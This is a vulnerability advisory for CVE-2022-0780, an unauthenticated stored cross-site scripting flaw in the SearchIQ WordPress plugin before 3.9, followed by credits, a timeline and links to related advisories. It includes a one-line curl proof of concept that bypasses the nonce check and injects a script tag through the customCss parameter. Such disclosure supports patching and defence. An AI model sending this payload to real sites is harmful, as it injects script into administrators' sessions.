SearchIQ < 3.9 – Unauthenticated Stored XSS | CVE 2022-0780 | Plugin Vulnerabilities

Description

The plugin contains a flag to disable the verification of CSRF nonces, granting unauthenticated attackers access to the siq_ajax AJAX action and allowing them to perform Cross-Site Scripting attacks due to the lack of sanitisation and escaping in the customCss parameter

Proof of Concept

Once the plugin is configured with an API key (can be a dummy one such as 123):

curl https://example.com/wp-admin/admin-ajax.php --data "action=siq_ajax&customCss=</textarea><script>alert('xss')</script>&nononce=1&task=set_custom_style"

The XSS will be triggered when an admin open the Options tab of the plugin (/wp-admin/admin.php?page=dwsearch&tab=tab-2)

Affects Plugins

Fixed in 3.9

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

0ee7d1a8-9782-4db5-b055-e732f2763825

Timeline

Publicly Published

2022-03-28 (about 3 years ago)

Added

2022-03-28 (about 3 years ago)

Last Updated

2022-04-11 (about 3 years ago)

Other

Published

Title

Published

2024-04-09

Title

WP < 6.5.2 - Unauthenticated Stored XSS

Published

2025-03-27

Title

WP Google Street View < 1.1.6 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2025-01-16

Title

Jet Skinner for BuddyPress <= 1.2.5 - Reflected Cross-Site Scripting

Published

2025-01-17

Title

Rate Star Review Vote – AJAX Reviews, Votes, Star Ratings < 1.6.4 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-06-02

Title

wpForo + wpForo Advanced Attachments < 3.2.0 - Unauthenticated Stored Cross-Site Scripting